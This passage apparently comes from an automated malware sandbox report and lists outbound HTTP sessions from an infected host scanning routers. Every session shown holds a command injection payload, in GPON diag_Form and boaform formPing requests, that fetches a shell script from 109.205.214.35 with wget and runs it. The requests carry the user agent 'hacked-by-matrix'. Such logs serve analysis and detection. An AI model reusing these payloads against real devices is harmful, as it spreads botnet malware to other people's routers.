                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        275192.168.2.1353640118.55.254.28443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:05.484570980 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        276192.168.2.13478725.70.137.119443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:05.484587908 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        277192.168.2.133606042.101.84.45443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:05.484597921 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        278192.168.2.13453345.203.252.228443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:05.484620094 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        279192.168.2.1350206212.170.67.34443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:05.484625101 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        280192.168.2.13496325.77.111.126443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:05.484636068 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        281192.168.2.1355666212.9.8.94443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:05.484643936 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        282192.168.2.133537242.52.3.193443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:05.484652042 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        283192.168.2.1341604109.200.3.199443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:05.484694958 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        284192.168.2.135480042.241.43.184443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:05.484709024 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        285192.168.2.1342886118.203.205.77443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:05.484718084 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        286192.168.2.1341568118.181.206.150443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:05.484730005 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        287192.168.2.1360716109.171.3.252443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:05.484750032 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        288192.168.2.1333390109.177.150.106443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:05.484750032 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        289192.168.2.1343686109.211.251.243443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:05.484775066 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        290192.168.2.1337442118.181.188.217443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:05.484778881 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        291192.168.2.134126442.117.244.116443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:05.484807014 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        292192.168.2.1334232118.73.226.149443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:05.484826088 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        293192.168.2.1353724178.135.116.1721723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:06.743486881 CET282OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:07.820283890 CET282OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:09.100275993 CET282OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        294192.168.2.1344868181.116.77.131723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:06.818595886 CET282OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:08.268270016 CET282OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:09.965497017 CET282OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:13.421787977 CET282OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:20.337316990 CET282OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:33.902688026 CET282OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:02.060239077 CET282OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        295192.168.2.1353008213.188.217.1321723
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:07.845017910 CET282OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:08.333897114 CET282OUTGET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        296192.168.2.135942423.88.26.2028080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:07.900012016 CET442OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
